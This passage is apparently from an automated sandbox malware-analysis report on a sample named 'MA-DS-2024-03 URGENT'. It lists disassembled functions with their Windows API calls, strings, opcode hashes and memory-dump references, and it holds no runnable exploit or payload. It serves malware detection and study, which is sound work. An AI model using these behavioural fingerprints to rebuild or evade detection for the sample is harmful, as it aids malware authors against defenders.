                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                        • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                        • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                        • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                        Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                        • GetDlgCtrlID.USER32 ref: 0045901F
                                                        • GetParent.USER32 ref: 0045903B
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                        • GetDlgCtrlID.USER32(?), ref: 00459047
                                                        • GetParent.USER32(?), ref: 00459063
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                        • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                        • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                        • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                        Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                        • GetDlgCtrlID.USER32 ref: 00459108
                                                        • GetParent.USER32 ref: 00459124
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                        • GetDlgCtrlID.USER32(?), ref: 00459130
                                                        • GetParent.USER32(?), ref: 0045914C
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                        • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                        • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                        • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                        Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32 ref: 0045916F
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                        • _wcscmp.LIBCMT ref: 00459196
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-3381328864
                                                        • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                        • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                        • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                        • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                        Function 004611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                        • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                                        • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                        • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                                                        Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-2080382077
                                                        • Opcode ID: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                        • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                        • Opcode Fuzzy Hash: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                        • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                        Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                        • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                        • Opcode Fuzzy Hash: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                        • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                        Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                          • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                          • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                          • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                        • GetDC.USER32 ref: 0043CD32
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                        • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                        • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                        • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                        • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                        Function 016B1A1B Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlDecodePointer.NTDLL(00000000), ref: 016B1A3E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: DecodePointer
                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                        • API String ID: 3527080286-3064271455
                                                        • Opcode ID: 7b2a2f5bb8d00dd1b14a9a25e84c0d28d3d3a56e71c749378015550cbd4e50f5
                                                        • Instruction ID: 8e3d9cf3aae51736835926f5aee28f0f430e47896dc15a9bb7a8d39f49f1ac91
                                                        • Opcode Fuzzy Hash: 7b2a2f5bb8d00dd1b14a9a25e84c0d28d3d3a56e71c749378015550cbd4e50f5
                                                        • Instruction Fuzzy Hash: 3C51AA7190050AEBDF149FA8FDA81EDBFB0FF4A300F144199D981A7318CB358AA8CB54
                                                        Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                        • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                        • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                                        • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                        • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                                        Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                          • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                          • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                        • _wcscmp.LIBCMT ref: 00464D5A
                                                        • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                        • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                        • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                        • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                        Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                        • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                        • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                        • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                        Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                        • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                        • DestroyIcon.USER32(?), ref: 0043C3AB
                                                          • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                        • String ID:
                                                        • API String ID: 2819616528-0
                                                        • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                        • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                                        • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                        • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                                        Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                                        • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                                        • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                                        • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                                        • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                                        • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
